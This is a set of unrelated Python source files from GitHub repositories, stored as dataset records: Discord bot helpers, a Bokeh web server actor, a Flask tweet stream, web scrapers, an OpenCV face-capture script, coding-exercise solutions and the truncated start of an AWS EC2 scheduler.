try:\r\n msg = await ctx.send(embed=embed, view=view, delete_after=delete_after)\r\n return msg\r\n except Forbidden:\r\n # the coroutine must be awaited, otherwise the fallback message is never sent\r\n return await send_msg(ctx, view=view, delete_after=delete_after)\r\n\r\n\r\nasync def send_img(ctx, fileArray: np.ndarray, channel=None):\r\n cv2.imwrite('file.png', cv2.cvtColor(fileArray, cv2.COLOR_RGB2BGR))\r\n if channel:\r\n return await channel.send(file=discord.File('file.png'))\r\n else:\r\n return await ctx.send(file=discord.File('file.png'))\r\n\r\n\r\nasync def send_msg(ctx, msg=None, view=None,delete_after=None):\r\n if not msg:\r\n msg = f\"Hey, seems like I can't send any message in {ctx.channel.name} on {ctx.guild.name}\"\r\n try:\r\n msg = await ctx.send(msg, view=view,delete_after=delete_after)\r\n return msg\r\n except Forbidden:\r\n await ctx.author.send(msg)\r\n\r\n\r\nasync def send_cancel_msg(ctx, msg='Operation canceled'):\r\n await send_msg(ctx, msg=msg)\r\n\r\ndef errorMsg():\r\n exc_type, exc_obj, exc_tb = sys.exc_info()\r\n return \"ERROR: \" + str(exc_type) + \" \" + str(exc_obj) + \" | Line: \" + str(exc_tb.tb_lineno)\r\n\r\n\r\ndef errorEmbed(title):\r\n return discord.Embed(\r\n title=title, color=0xff0000)\r\n\r\n\r\ndef successEmbed(title):\r\n return discord.Embed(\r\n title=title, color=0x00ff00)\r\n\r\n\r\ndef info_embed(title):\r\n return discord.Embed(\r\n title=title, color=discord.Color.blue())\r\n\r\ndef embed_from_dict(title:str,desc:str,data:dict):\r\n embed = discord.Embed(title=title,description=desc,color=discord.Color.blue())\r\n for key,val in data.items():\r\n value = '-'+'\\n-'.join(val) if isinstance(val,(tuple,list)) else val\r\n embed.add_field(name=key,value=value,inline=False)\r\n return embed\r\n\r\ndef removeMatches(theList, toDelete):\r\n newList = []\r\n for item in theList:\r\n if item not in toDelete:\r\n newList.append(item)\r\n return newList\r\n\r\n\r\nasync def clearReactions(msg, embed,timedOut=True):\r\n try:\r\n if timedOut:\r\n embed.set_footer(text=\"Timed Out!\")\r\n await msg.edit(embed=embed)\r\n await msg.clear_reactions()\r\n except Exception:\r\n pass\r\n\r\nasync def elementsInPages(bot, ctx, elementEmbeds):\r\n if len(elementEmbeds) == 1:\r\n await send_embed(ctx, elementEmbeds[0])\r\n return\r\n reactions = {\"⬛\": \"Non-element\", \"🟥\": \"Fire\", \"🟦\": \"Water\",\r\n \"🟩\": \"Wind\", \"🟫\": \"Earth\", \"🟨\": \"Holy\", \"🟪\": \"Dark\",\r\n \"❌\": \"Cancel\"}\r\n elements = {element.title: element for element in elementEmbeds}\r\n msgReactions = {}\r\n for emoji, element in reactions.items():\r\n if element in elements.keys() or emoji == '❌':\r\n msgReactions[emoji] = element\r\n msg = await send_embed(ctx, elementEmbeds[0])\r\n\r\n for reaction in msgReactions.keys():\r\n await msg.add_reaction(reaction)\r\n cache_msg = discord.utils.get(bot.cached_messages, id=msg.id)\r\n emojistr = str(cache_msg.reactions[0])\r\n while True:\r\n try:\r\n reaction, user = await bot.wait_for(\r\n \"reaction_add\",\r\n timeout=25,\r\n check=lambda reaction, user: str(\r\n reaction.emoji) in msgReactions.keys()\r\n and user.id != bot.user.id\r\n and reaction.message.id == msg.id\r\n and user.id == ctx.author.id\r\n )\r\n except asyncio.TimeoutError:\r\n embed = elements[msgReactions[emojistr]]\r\n await clearReactions(msg, embed)\r\n break\r\n else:\r\n previous = emojistr\r\n emojistr = str(reaction.emoji)\r\n await reaction.remove(user)\r\n if previous != emojistr:\r\n if emojistr == \"❌\":\r\n await clearReactions(msg, elements[msgReactions[previous]])\r\n break\r\n await 
msg.edit(embed=elements[msgReactions[emojistr]])\r\n\r\n\r\ndef addToLog(time, author, authorid, server, serverid, content):\r\n headers = [\"Time (UTC)\", \"Author\", \"Author ID\", \"Server\",\r\n \"Server ID\", \"Message content\"]\r\n time = datetime.utcnow().strftime('%Y-%m-%d')\r\n if os.path.isfile(f'logs/{time}.log.csv'):\r\n with open(f'logs/{time}.log.csv', 'a') as log:\r\n writer = csv.writer(log)\r\n writer.writerow(\r\n [datetime.utcnow().strftime('%Y-%m-%d-%H:%M:%S'), author, authorid, server, serverid, content])\r\n else:\r\n with open(f'logs/{time}.log.csv', 'w') as log:\r\n writer = csv.writer(log)\r\n writer.writerow(headers)\r\n writer.writerow(\r\n [datetime.utcnow().strftime('%Y-%m-%d-%H:%M:%S'), author, authorid, server, serverid, content])\r\n\r\n\r\nasync def getMsgFromUser(ctx, bot, timeout=30):\r\n def check(msg):\r\n return msg.channel == ctx.channel and msg.author == ctx.message.author\r\n msg = None\r\n try:\r\n msg = await bot.wait_for(\"message\", check=check,\r\n timeout=timeout) # x seconds to reply\r\n except asyncio.TimeoutError:\r\n pass\r\n return msg\r\n\r\n\r\nasync def getMulitpleMsgs(ctx, bot, timeout=30, endLoop='end'):\r\n # collect messages until the user times out or sends the endLoop keyword;\r\n # the coroutine must be awaited and Message.content compared, not the Message itself\r\n allMsg = []\r\n while True:\r\n msg = await getMsgFromUser(ctx, bot, timeout=timeout)\r\n if not msg or msg.content.lower() == endLoop:\r\n break\r\n allMsg.append(msg)\r\n return allMsg\r\n\r\n\r\ndef cancelChecker(toCheck, cancelstr='cancel'):\r\n return not toCheck or toCheck.lower() == cancelstr\r\n\r\n\r\nasync def getAtatchment(ctx, bot, timeout=40):\r\n def check(msg):\r\n return msg.channel == ctx.channel and msg.author == ctx.message.author and len(msg.attachments) > 0\r\n file = None\r\n msg = None\r\n try:\r\n msg = await bot.wait_for(\"message\", check=check,\r\n timeout=timeout) # x seconds to reply\r\n file = msg.attachments[0].url\r\n except asyncio.TimeoutError:\r\n pass\r\n return file, msg\r\n\r\n\r\ndef writeToFile(path, content):\r\n with open(path, 'w') as file:\r\n file.write(str(content))\r\n\r\n\r\ndef parseTime(timeToParse: datetime):\r\n return timeToParse.strftime('%Y-%m-%d %H:%M:%S')\r\n\r\n\r\ndef getDatetimeFromParsedString(date: str):\r\n return datetime.strptime(date, '%Y-%m-%d %H:%M:%S')\r\n\r\n\r\ndef beautifyDate(datetimeToParse: datetime):\r\n return datetimeToParse.strftime('%H:%M - %a %d-%b-%Y')\r\n\r\n\r\ndef getPrettyStringFromDict(toBeautify: dict):\r\n beautifulStuff = ''\r\n for key, val in toBeautify.items():\r\n beautifulStuff += f'{key} => {val}\\n'\r\n return beautifulStuff\r\n\r\n\r\ndef getBotActivity(activityType: str, msg, url=None):\r\n \"\"\"\r\n Returns the bot activity and its content based on the input parameters\r\n\r\n Parameters\r\n ---------------\r\n activityType : str\r\n msg : str\r\n url : str\r\n \"\"\"\r\n if activityType.lower() == \"playing\":\r\n activity = discord.Game(name=msg)\r\n elif activityType.lower() == \"streaming\":\r\n activity = discord.Streaming(\r\n name=msg, url=url)\r\n elif activityType.lower() == \"listening\":\r\n activity = discord.Activity(\r\n type=discord.ActivityType.listening, name=msg)\r\n elif activityType.lower() == \"watching\":\r\n activity = discord.Activity(\r\n type=discord.ActivityType.watching, name=msg)\r\n else:\r\n activity = None\r\n\r\n return activity\r\n\r\n\r\ndef parse_possesive(name):\r\n \"\"\"\r\n Returns the name + the possessive 's or '\r\n Parameters\r\n -----------\r\n name : str\r\n \"\"\"\r\n if name[-1].lower() == \"s\":\r\n return name + \"\\'\"\r\n 
else:\r\n return name + \"\\'s\"\r\n\r\n\r\ndef getBotStatus(status):\r\n \"\"\"\r\n Returns the discord bot status\r\n\r\n Parameters\r\n ---------------\r\n status : str\r\n \"\"\"\r\n if status.lower() == \"dnd\":\r\n return discord.Status.dnd\r\n elif status.lower() == \"invisible\":\r\n return discord.Status.invisible\r\n elif status.lower() == \"idle\":\r\n return discord.Status.idle\r\n else:\r\n return discord.Status.online\r\n\r\n\r\ndef getDiscordColor(color: str):\r\n colors = {\r\n 'light grey': discord.Color.light_grey(),\r\n 'red': discord.Color.red(),\r\n 'blue': discord.Color.blue(),\r\n 'green': discord.Color.green(),\r\n 'orange': discord.Color.orange(),\r\n 'yellow': discord.Color.yellow(),\r\n 'purple': discord.Color.purple()\r\n }\r\n return colors.get(color.lower())\r\n\r\n\r\ndef camel_case(s: str):\r\n s = re.sub(r\"(_|-)+\", \" \", s).title().replace(\" \", \"\")\r\n return ''.join([s[0].lower(), s[1:]])\r\n\r\n\r\ndef ordinal(n): return f'{n}{\"tsnrhtdd\"[(n//10%10!=1)*(n%10<4)*n%10::4]}'\r\n\r\n\r\ndef chunks(lst, n):\r\n \"\"\"Yield successive n-sized chunks from lst.\"\"\"\r\n for i in range(0, len(lst), n):\r\n yield lst[i:i + n]\r\n\r\n\r\ndef hconcat_resize_min(im_list, interpolation=cv2.INTER_CUBIC):\r\n h_min = min(im.shape[0] for im in im_list)\r\n im_list_resize = [cv2.resize(im, (int(im.shape[1] * h_min / im.shape[0]), h_min), interpolation=interpolation)\r\n for im in im_list]\r\n return cv2.hconcat(im_list_resize)\r\n\r\n\r\ndef vconcat_resize_min(im_list, interpolation=cv2.INTER_CUBIC):\r\n w_min = min(im.shape[1] for im in im_list)\r\n im_list_resize = [cv2.resize(im, (w_min, int(im.shape[0] * w_min / im.shape[1])), interpolation=interpolation)\r\n for im in im_list]\r\n return cv2.vconcat(im_list_resize)\r\n\r\n\r\ndef convert_string_to_bytes(string):\r\n bytes = b''\r\n for i in string:\r\n bytes += struct.pack(\"B\", ord(i))\r\n return bytes\r\n\r\n\r\ndef binary_str_to_nparray(binstr):\r\n imgData = io.BytesIO(binstr)\r\n img = Image.open(imgData).convert('RGB')\r\n img = np.asarray(img)\r\n return img\r\n\r\n\r\ndef downloadImgFromUrl(url):\r\n r = requests.get(url)\r\n if r.status_code == 200:\r\n r.raw.decode_content = True\r\n return r.content\r\n","repo_name":"ThePoisoned1/DaWagonBot","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"12280168174","text":"import functools\nimport logging\nimport os\nimport re\n\nfrom bokeh.application import Application\nfrom bokeh.application.handlers import FunctionHandler\nfrom bokeh.embed import server_document\nfrom bokeh.server.server import Server\nfrom tornado import web\n\nfrom ... 
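The `ordinal` one-liner in the utilities record above packs all four English suffixes into the slice `"tsnrhtdd"[k::4]` (stride-4 slices of that string yield "th", "st", "nd", "rd"). A minimal, standard-library-only sketch that unpacks the trick and cross-checks it against a readable equivalent; the test values are illustrative:

```python
def ordinal(n):
    # The boolean factors zero out k for 4-9, 0, and the 11-13 teens,
    # so only 1/2/3 outside a teen select "st"/"nd"/"rd".
    return f'{n}{"tsnrhtdd"[(n // 10 % 10 != 1) * (n % 10 < 4) * n % 10::4]}'

def ordinal_verbose(n):
    # The same rule, spelled out.
    if n % 100 in (11, 12, 13):
        suffix = "th"
    else:
        suffix = {1: "st", 2: "nd", 3: "rd"}.get(n % 10, "th")
    return f"{n}{suffix}"

if __name__ == "__main__":
    for n in (1, 2, 3, 4, 11, 12, 13, 21, 102, 113):
        assert ordinal(n) == ordinal_verbose(n), n
    print([ordinal(n) for n in range(1, 25)])
```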
import oscar as mo\nfrom ...utils import get_next_port\n\nlogger = logging.getLogger(__name__)\n_ROOT_PLACEHOLDER = 'ROOT_PLACEHOLDER'\n\n\nclass BokehStaticFileHandler(web.StaticFileHandler): # pragma: no cover\n @staticmethod\n def _get_path_root(root, path):\n from bokeh import server\n path_parts = path.rsplit('/', 1)\n if 'bokeh' in path_parts[-1]:\n root = os.path.join(os.path.dirname(server.__file__), \"static\")\n return root\n\n @classmethod\n def get_absolute_path(cls, root, path):\n return super().get_absolute_path(cls._get_path_root(root, path), path)\n\n def validate_absolute_path(self, root, absolute_path):\n return super().validate_absolute_path(\n self._get_path_root(root, absolute_path), absolute_path)\n\n\nclass MarsRequestHandler(web.RequestHandler): # pragma: no cover\n def initialize(self, supervisor_addr):\n self._supervisor_addr = supervisor_addr\n\n def get_root_path(self):\n req_path = re.sub('/+', '/', self.request.path).lstrip('/')\n slash_count = sum(1 for c in req_path if c == '/')\n if slash_count > 0:\n return '../' * slash_count\n else:\n return './'\n\n def write_rendered(self, template, **kwargs):\n self.write(template.render(\n request=self.request, root_path=self.get_root_path(), **kwargs))\n\n def bokeh_server_document(self, url, resources=\"default\", arguments=None):\n raw_script = server_document(\n f'{_ROOT_PLACEHOLDER}/{url}', relative_urls=True, resources=resources, arguments=arguments)\n\n # FIXME lines below hacks codes generated by bokeh to support\n # websocket connection in proxy-passed environments\n quote = raw_script[raw_script.index(_ROOT_PLACEHOLDER) - 1]\n path_replacer = (\n f'&bokeh-app-path=\" + window.location.pathname.match(/.*\\\\//) + \"{self.get_root_path()}'\n )\n path_replacer = path_replacer.replace('\"', quote)\n\n script = raw_script.replace(f'&bokeh-app-path=/{_ROOT_PLACEHOLDER}/', path_replacer) \\\n .replace(f'{_ROOT_PLACEHOLDER}/', self.get_root_path())\n return script\n\n\nclass WebActor(mo.Actor):\n def __init__(self, config):\n super().__init__()\n self._config = config\n self._web_server = None\n\n async def start(self):\n static_path = os.path.join(os.path.dirname(__file__), 'static')\n supervisor_addr = self.address\n\n host = self._config.get('host') or '0.0.0.0'\n port = self._config.get('port')\n bokeh_apps = self._config.get('bokeh_apps', {})\n web_handlers = self._config.get('web_handlers', {})\n\n handlers = dict()\n for p, h in bokeh_apps.items():\n handlers[p] = Application(FunctionHandler(\n functools.partial(h, supervisor_addr=supervisor_addr)))\n\n handler_kwargs = {'supervisor_addr': supervisor_addr}\n extra_patterns = [\n (r'[^\\?\\&]*/static/(.*)', BokehStaticFileHandler, {'path': static_path})\n ]\n for p, h in web_handlers.items():\n extra_patterns.append((p, h, handler_kwargs))\n\n retrial = 5\n while retrial:\n try:\n if port is None:\n port = get_next_port()\n\n self._web_server = Server(\n handlers, allow_websocket_origin=['*'],\n address=host, port=port,\n extra_patterns=extra_patterns,\n http_server_kwargs={'max_buffer_size': 2 ** 32},\n )\n self._web_server.start()\n logger.info('Mars UI started at %s:%d', host, port)\n break\n except OSError: # pragma: no cover\n if port is not None:\n raise\n retrial -= 1\n if retrial == 0:\n raise\n\n\nasync def start(config: dict, address: str = None):\n ref = await mo.create_actor(WebActor, config=config.get('web', {}),\n address=address)\n await 
ref.start()\n","repo_name":"chi2liu/mars","sub_path":"mars/services/web/supervisor.py","file_name":"supervisor.py","file_ext":"py","file_size_in_byte":4364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"36128069873","text":"import json\nimport time\nfrom random import random\nfrom redis import StrictRedis\nfrom bson import json_util\nfrom flask import Flask, Response, jsonify\nfrom flask.ext.cors import CORS, cross_origin\nfrom pymongo import MongoClient, CursorType\nfrom threading import Thread\n\ndef connect():\n con = MongoClient()\n return con[\"pacmay\"]\n\napp = Flask(__name__)\ncors = CORS(app)\nhandle = connect()\nredis = StrictRedis()\n\ndef rand_loc():\n lat = random() * 180 - 90\n lng = random() * 360 - 180\n return [lat, lng]\n\ndef get_cursor(collection, condition, await_data=True):\n cursor_type = CursorType.TAILABLE\n if await_data:\n cursor_type = CursorType.TAILABLE_AWAIT\n cur = collection.find(condition, cursor_type=cursor_type)\n return cur\n\ndef get_tweets():\n cursor = get_cursor(handle.tweets, {\"coordinates.type\": \"Point\"})\n i = 0\n while cursor.alive:\n i += 1\n try:\n doc = cursor.next()\n if doc and \"coordinates\" in doc and doc[\"coordinates\"]:\n coordinates = doc[\"coordinates\"][\"coordinates\"]\n else:\n coordinates = rand_loc()\n\n if \"text\" in doc:\n text = doc[\"text\"]\n\n if \"user\" in doc and \"profile_image_url\" in doc[\"user\"]:\n profile_image = doc[\"user\"][\"profile_image_url\"]\n\n redis.publish(\"chat\", '{\"coordinates\": %s, \"data\": %s, \"index\": %i, \"profile_image\": %s}' \n % (coordinates, json.dumps(text), i, json.dumps(profile_image)))\n except StopIteration:\n time.sleep(1)\n\ndef run_thread():\n th = Thread(target=get_tweets)\n th.start()\n\ndef event_stream():\n pubsub = redis.pubsub()\n pubsub.subscribe(\"chat\")\n for message in pubsub.listen():\n yield \"data: %s\\n\\n\" % message[\"data\"]\n\n@app.route(\"/new_tweets\")\n@cross_origin()\ndef new_tweets():\n return Response(event_stream(), mimetype=\"text/event-stream\")\n\n@app.route(\"/tweets\")\n@cross_origin()\ndef tweets():\n cursor = handle.tweets.find({\"coordinates.type\": \"Point\"})\n tweets = [{\"coordinates\": doc[\"coordinates\"][\"coordinates\"]} for doc in cursor]\n return json.dumps(tweets)\n\nif __name__ == \"__main__\":\n app.before_first_request(run_thread)\n app.run(debug=True)\n","repo_name":"codenut/pacmay_heatmap","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12589889390","text":"\nfrom selenium import webdriver\nimport time\n\ndriver = webdriver.Chrome(\"C:\\\\Users\\\\legion\\\\Desktop\\\\chromedriver.exe\")\n\ndriver.get(\"http://localhost:3000/contact/contact\")\ntime.sleep(3)\ndriver.maximize_window()\ntime.sleep(3)\ndriver.find_element_by_id(\"htc\").click()","repo_name":"sk9073/WalkoverWork","sub_path":"pages/contact/Contact.py","file_name":"Contact.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25557975932","text":"import cv2, os\n\nhaar_file = \"haarcascade_frontalface_default.xml\"\ndataset = \"dataset\"\nsub_data = \"sahil\"\n\npath = os.path.join(dataset,sub_data)\nif not os.path.isdir(path):\n os.mkdir(path)\n\n(width, height) = (130,100)\n\nface_casscade = cv2.CascadeClassifier(haar_file)\ncam = cv2.VideoCapture(0)\n\ncount = 
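The `pacmay_heatmap` record above chains a tailable MongoDB cursor into Redis pub/sub and out through a `text/event-stream` response. Below is a minimal sketch of just the server-sent-events half, with the Redis broker swapped for an in-process queue so it runs with nothing but Flask installed; the route and payload names are illustrative. (Redis pub/sub earns its keep in the original because it fans one event out to many connected clients, which a single `Queue` cannot do.)

```python
import json
import queue
import threading
import time

from flask import Flask, Response

app = Flask(__name__)
events = queue.Queue()

def producer():
    # Stand-in for the Mongo-tailing thread: emit one payload per second.
    n = 0
    while True:
        events.put(json.dumps({"index": n}))
        n += 1
        time.sleep(1)

def event_stream():
    while True:
        # Each SSE frame is a "data:" line followed by a blank line.
        yield "data: %s\n\n" % events.get()

@app.route("/stream")
def stream():
    return Response(event_stream(), mimetype="text/event-stream")

if __name__ == "__main__":
    threading.Thread(target=producer, daemon=True).start()
    app.run(threaded=True)
```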
1\nwhile count < 31:\n    print(count)\n    (_, img) = cam.read()\n    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n    face = face_casscade.detectMultiScale(gray)\n    for (x, y, w, h) in face:\n        cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)\n        # crop rows y:y+h and columns x:x+w (the original sliced x:x+h,\n        # using the height where the width belongs)\n        face = gray[y:y+h, x:x+w]\n        face_resize = cv2.resize(face, (width, height))\n        cv2.imwrite(f'{path}/{count}.png', face_resize)\n        count += 1\n\n    cv2.imshow(\"Saving in DataBase\", img)\n    key = cv2.waitKey(100)\n    if key == 27:\n        break\ncam.release()\ncv2.destroyAllWindows()","repo_name":"Hrithik5532/OpenCV_Projects","sub_path":"Face Recognition/create_data.py","file_name":"create_data.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"19475920900","text":"# solution 1\ndef get_median(counts, mids):\n    res = []\n    for mid in mids:\n        gone = 0\n        for i, v in enumerate(counts):\n            gone += v\n            if gone >= mid:\n                res.append(i)\n                break\n    return sum(res) / len(res)\n\n\n# Complete the activityNotifications function below.\ndef activityNotifications(expenditure, d):\n    alerts = 0\n    counts = [0] * 201\n\n    if d % 2 == 1:\n        mids = [d // 2 + 1]\n    else:\n        mids = [d // 2, d // 2 + 1]\n\n    for v in expenditure[:d]:\n        counts[v] += 1\n\n    for i, exp in enumerate(expenditure[d:]):\n        median = get_median(counts, mids)\n\n        if exp >= 2 * median:\n            alerts += 1\n\n        old_value = expenditure[i]\n        counts[old_value] -= 1\n        counts[exp] += 1\n\n    return alerts\n\n# solution 2\ndef activityNotifications(expenditure, d):\n    k = 200\n    counter = 0\n\n    count = (k + 1) * [0]  # indices run from 0 to max(array) inclusive\n\n    for i in expenditure[:d]:\n        count[i] += 1  # initial frequency array: count[j] is the frequency of number j\n\n    if (d % 2) == 1:  # odd window size\n        for i in range(d, len(expenditure)):\n            cumfreq = (k + 1) * [0]\n            cumfreq[0] = count[0]\n\n            for j in range(1, k + 1):\n                cumfreq[j] += cumfreq[j - 1] + count[j]\n\n                if cumfreq[j] > d / 2:\n                    median = j  # first j s.t. cumfreq[j-1] < (d+1)/2 and cumfreq[j] >= (d+1)/2\n                    break\n\n            if expenditure[i] >= 2 * median:\n                counter += 1\n\n            count[expenditure[i - d]] -= 1\n            count[expenditure[i]] += 1\n\n    if (d % 2) == 0:  # even window size\n        for i in range(d, len(expenditure)):\n            cumfreq = (k + 1) * [0]\n            cumfreq[0] = count[0]\n\n            m1 = None\n            m2 = None\n\n            for j in range(1, k + 1):\n                cumfreq[j] += cumfreq[j - 1] + count[j]\n\n                if (cumfreq[j] >= d / 2) and (m1 is None):\n                    m1 = j\n\n                if cumfreq[j] >= (d + 1) / 2:\n                    m2 = j\n                    median = (m1 + m2) / 2\n                    break\n\n            if expenditure[i] >= 2 * median:\n                counter += 1\n\n            count[expenditure[i - d]] -= 1\n            count[expenditure[i]] += 1\n\n    return counter\n\n\n######################################################################\n# Enter your code here. Read input from STDIN. Print output to STDOUT\nn, d = map(int, input().split())\na = list(map(int, input().split()))  # list() so the values can be indexed below\nnoti = 0\n\n# histogram for expenditure of the 1st d days\nw = [0] * 201\nfor i in range(d):\n    w[a[i]] += 1\n\n# calculate the median: index is the count of days till we get to the position of the median value\n# in case of even sample size (d days), we need two values to calculate the median. 
To make it simpler, I separated the odd and the even case\nfor i in range( n -d):\n index, li, lo = 0, 0, 0\n if d% 2 != 0:\n for j in range(201):\n index += w[j]\n if index >= d / 2 + 1:\n med = float(j)\n break\n else:\n for j in range(201):\n index += w[j]\n if index >= (d / 2) and li == 0:\n li = j\n if index >= (d / 2 + 1) and lo == 0:\n lo = j\n if li != 0 and lo != 0:\n med = (float(li) + float(lo)) / 2\n break\n if float(a[d + i]) >= med * 2:\n noti += 1\n\n # move the window of d days forward by 1 day\n w[a[i]] -= 1\n w[a[d + i]] += 1\n\n# we're done\nprint(noti)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"NikolayVaklinov10/Interview_Preparation_Kit","sub_path":"Sorting/Fraudulent_Activity_Notifications.py","file_name":"Fraudulent_Activity_Notifications.py","file_ext":"py","file_size_in_byte":3748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18556712931","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nlink = \"https://daiyafoods.com/food-service/\"\r\nheaders={'User-Agent': 'Mozilla/5.0'}\r\nresult = requests.get(link, headers=headers)\r\nsoup = BeautifulSoup(result.content.decode(), 'html.parser')\r\nproduct=''\r\narticle = soup.find(\"div\", {\"class\": \"-df-homeProductsCarouselScroll carouselScroll df2020-slides fs-slides\"}).findAll('p')\r\nfor val in article:\r\n product += ''.join(val.findAll(text=True))\r\nprint(\"Available Product Name are\"+product)\r\n\r\n","repo_name":"salonypermanand/CSTEST","sub_path":"CsAssign.py","file_name":"CsAssign.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30339429286","text":"#!/bin/python\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\nclass Stack():\n def __init__(self):\n self.stack = []\n def push(self, x):\n self.stack.insert(0, x)\n def pop(self):\n return self.stack.pop(0)\n def len(self):\n return len(self.stack)\n\n# Complete the isBalanced function below.\n\n# Comments are examples of strings that a case would account for\ndef isBalanced(s):\n stack = Stack()\n for char in s:\n if char == '{' or char == '[' or char == '(':\n stack.push(char)\n if char == ')':\n # )()...\n # [)...\n if stack.len() == 0 or stack.pop() != '(':\n return \"NO\"\n if char == ']':\n # ][ ...\n # {]...\n if stack.len() == 0 or stack.pop() != '[':\n return \"NO\"\n if char == '}':\n # }}...\n # (}...\n if stack.len() == 0 or stack.pop() != '{':\n return \"NO\"\n\n # This handles strings like (((\n if stack.len() > 0:\n return \"NO\"\n else:\n return \"YES\"\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n t = int(raw_input())\n\n for t_itr in xrange(t):\n s = raw_input()\n\n result = isBalanced(s)\n\n fptr.write(result + '\\n')\n\n fptr.close()\n","repo_name":"dm36/interview-practice","sub_path":"hacker_rank/balanced_brackets.py","file_name":"balanced_brackets.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"35675921352","text":"# Atualizar o pip\r\n#\tpython -m pip install --upgrade pip\r\n#\r\n# Instalar o BeautifulSoup\r\n#\tpip install beautifulsoup4\r\n#\r\n# Instalar o requests\r\n#\tpip install requests\r\n#\r\n# Página fonte\r\n#\thttp://loteriasbr.com/site/home/?search=2018-11-02\r\n#\r\n# Danton Cavalcanti Franco Junior - falecom@dantonjr.com.br\r\n\r\nfrom bs4 import BeautifulSoup\r\nfrom datetime import 
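All three fraud-notification solutions above rebuild a cumulative-frequency scan for every day; the same counting-array idea reads more directly as a helper that returns the k-th smallest value in the window. A self-contained sketch, assuming values bounded by 0..200 as in the original problem (the assert uses the well-known HackerRank sample):

```python
def activity_notifications(expenditure, d):
    counts = [0] * 201
    for v in expenditure[:d]:
        counts[v] += 1

    def kth(k):
        # Value of the k-th smallest element (1-based) in the window.
        seen = 0
        for value, c in enumerate(counts):
            seen += c
            if seen >= k:
                return value

    alerts = 0
    for i in range(d, len(expenditure)):
        # Compare against 2*median without ever touching floats.
        if d % 2:
            twice_median = 2 * kth(d // 2 + 1)
        else:
            twice_median = kth(d // 2) + kth(d // 2 + 1)
        if expenditure[i] >= twice_median:
            alerts += 1
        counts[expenditure[i - d]] -= 1  # slide the window forward
        counts[expenditure[i]] += 1
    return alerts

assert activity_notifications([2, 3, 4, 2, 3, 6, 8, 4, 5], 5) == 2
```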
datetime, timedelta\r\nimport requests\r\nimport csv\r\nimport re\r\n\r\narquivo = open('resultados.csv', 'w', newline = '')\r\ngravaCSV = csv.writer(arquivo, delimiter = ';', doublequote = False, skipinitialspace = True)\r\ngravaCSV.writerow(['Data', 'Jogo', '1 prêmio', '2 prêmio', '3 prêmio', '4 prêmio', '5 prêmio'])\r\ndataInicial = datetime(2018, 11, 1)\r\n\r\nfor dias in range(int((datetime.now() - dataInicial).days)):\r\n dataFim = dataInicial + timedelta(dias)\r\n url = \"https://loteriasbr.com/site/home/?search=%s\" % dataFim.strftime('%Y-%m-%d')\r\n pagina = requests.get(url)\r\n\r\n soup = BeautifulSoup(pagina.content, 'html.parser')\r\n print(url, \"Status:\", pagina.status_code)\r\n\r\n divJogos = soup.findAll('div', class_='panel quadro-jogo')\r\n\r\n for jogo in divJogos:\r\n nomeCheio = jogo.findAll('div')\r\n nomeJogo = nomeCheio[0].get_text()\r\n nomeJogo = nomeJogo[1:nomeJogo.find(' ')]\r\n if not re.search(\".*(PT|FD|COR).*\", nomeJogo):\r\n continue\r\n\r\n resultados = jogo.findAll('span', class_='pull-right')\r\n gravaCSV.writerow([dataFim.strftime('%d/%m/%Y'), nomeJogo, resultados[0].get_text().replace('.', ''), resultados[1].get_text().replace('.', ''), resultados[2].get_text().replace('.', ''), resultados[3].get_text().replace('.', ''), resultados[4].get_text().replace('.', '')])\r\n\r\narquivo.close()\r\nprint(\"fim\")\r\n","repo_name":"dantonjr/python","sub_path":"webScraping/jogoDoBicho.py","file_name":"jogoDoBicho.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"29512353944","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Requires: your boto config file (~/.boto) to contain your aws credentials\n#\n# [Credentials]\n# aws_access_key_id = \n# aws_secret_access_key = \n\n__author__ = 'monkee'\n__project__ = 'TheSleeper'\n\nimport boto.ec2, boto.sns, boto.utils\nimport yaml, sys,logging,time,os\nfrom croniter import croniter\n\n\nclass thesleeper:\n conn = \"\"\n config = \"\"\n timestamp = time.strftime(\"%d/%m/%Y %H:%M:%S\")\n sns_stop = list()\n sns_start = list()\n profile_name = None\n profile_list = []\n sleeper_instance_id = None\n\n def __init__(self):\n self.load_credentials()\n self.load_defaults()\n self.set_timezone()\n self.sns_connect()\n self.get_sleeper_instance_id()\n #begin multiple connection loop\n for profile in self.profile_list:\n self.profile_name = profile\n self.ec2_connect()\n if self.config['general']['shutdown_untagged'] is True:\n self.search_for_untagged_to_stop()\n self.search_for_tagged()\n self.sns_message()\n #end multiple connection loop\n\n def load_credentials(self):\n for section,details in boto.config._sections.iteritems():\n if section == \"Credentials\":\n self.profile_list.append('None')\n continue\n if 'profile ' in section:\n self.profile_list.append(section[8:])\n continue\n\n def load_defaults(self):\n try:\n config_str = open(os.path.dirname(__file__) + '/config.yml', 'r')\n self.config = yaml.load(config_str)\n logfile = os.path.dirname(__file__) + \"/\" + self.config['general']['logfile']\n logging.basicConfig(filename=logfile, level=logging.INFO)\n except IOError as error:\n exit(\"Could not load 